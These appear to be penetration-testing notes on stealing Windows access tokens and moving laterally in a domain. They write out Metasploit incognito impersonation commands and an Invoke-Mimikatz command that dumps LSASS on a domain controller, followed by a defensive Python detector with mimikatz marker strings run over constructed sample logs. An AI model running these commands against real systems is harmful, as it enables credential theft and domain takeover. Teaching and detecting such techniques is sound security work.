Tokens are temporary keys that allow a user to perform actions on a system or network without having to provide a password again, similar to session cookies on a website. Tokens are generated once a user logs on to a system or starts an RDP session, and they remain until the system is rebooted.
Types of Tokens
- Delegate: Created for logging into a machine or RDP
- Impersonate: Used for non-interactive authentication such as network drive mapping
Ideally, you want to find tokens of a domain administrator in order to expose additional attack vectors against the domain controller.
To move laterally across different computers on the domain, you could do this by passing hashes or passwords of users that have privileges across multiple systems, or by compromising additional vulnerable services.
Dumping Tokens with Metasploit
meterpreter > load incognito
meterpreter > list_tokens -u
meterpreter > impersonate_token domain\\administrator
Now that we are running in the context of a domain administrator, we could use a tool like Invoke-Mimikatz to dump LSASS on the domain controller.
PS C:\> hostname
Win10Ent1
PS C:\> Invoke-Mimikatz -Command '"privilege::debug" "LSADump::LSA /inject" exit' -Computer DC1.ad.lab
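Added example, not part of the original notes: a small detection pass that scans constructed PowerShell script block logging (Event ID 4104) and Security audit (Event ID 4672) entries for the mimikatz module strings in the command above and for the SeDebugPrivilege / SeImpersonatePrivilege grants that token theft and LSASS dumping depend on. The JSON-lines layout, field names and sample values are assumptions made for the example.

```python
import json

# Constructed sample events (not real logs) in JSON-lines form, roughly as a log
# shipper would emit them. 4104 = PowerShell script block logging, 4672 = special
# privileges assigned to a new logon.
SAMPLE_LOG = r'''
{"EventID": 4104, "Computer": "Win10Ent1", "User": "AD\\jsmith", "ScriptBlockText": "Get-ChildItem C:\\Users"}
{"EventID": 4104, "Computer": "Win10Ent1", "User": "AD\\jsmith", "ScriptBlockText": "Invoke-Mimikatz -Command '\"privilege::debug\" \"LSADump::LSA /inject\" exit' -Computer DC1.ad.lab"}
{"EventID": 4672, "Computer": "DC1", "User": "AD\\jsmith", "PrivilegeList": "SeDebugPrivilege\nSeImpersonatePrivilege"}
{"EventID": 4672, "Computer": "DC1", "User": "AD\\svc_backup", "PrivilegeList": "SeBackupPrivilege"}
'''

# Module prefixes used by mimikatz command lines; cheap but high-signal in script block logs.
MIMIKATZ_MARKERS = ("invoke-mimikatz", "privilege::debug", "lsadump::", "sekurlsa::")
# Privileges that let a process read LSASS memory or assume another user's token.
SENSITIVE_PRIVILEGES = {"SeDebugPrivilege", "SeImpersonatePrivilege", "SeTcbPrivilege"}

def parse_events(text):
    """Parse one JSON event per non-empty line."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]

def check_script_block(event):
    """Flag 4104 events whose script text carries mimikatz markers."""
    text = event.get("ScriptBlockText", "").lower()
    hits = [m for m in MIMIKATZ_MARKERS if m in text]
    if hits:
        return f"mimikatz-style command on {event['Computer']} by {event['User']}: {', '.join(hits)}"
    return None

def check_privileges(event):
    """Flag 4672 events granting LSASS-access or impersonation privileges.
    This fires for routine admin logons too, so in practice correlate it with
    a 4104 hit from the same user within a short window before paging anyone."""
    privs = set(event.get("PrivilegeList", "").split())
    found = sorted(privs & SENSITIVE_PRIVILEGES)
    if found:
        return f"sensitive privileges granted on {event['Computer']} to {event['User']}: {', '.join(found)}"
    return None

CHECKS = {4104: check_script_block, 4672: check_privileges}

def detect(text):
    """Run the per-event-ID check over every event and collect findings."""
    alerts = []
    for event in parse_events(text):
        check = CHECKS.get(event.get("EventID"))
        finding = check(event) if check else None
        if finding:
            alerts.append(finding)
    return alerts

if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG):
        print("ALERT:", alert)
```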
Revert Msfconsole Shell
This will revert the meterpreter session to its original token context.
meterpreter > rev2self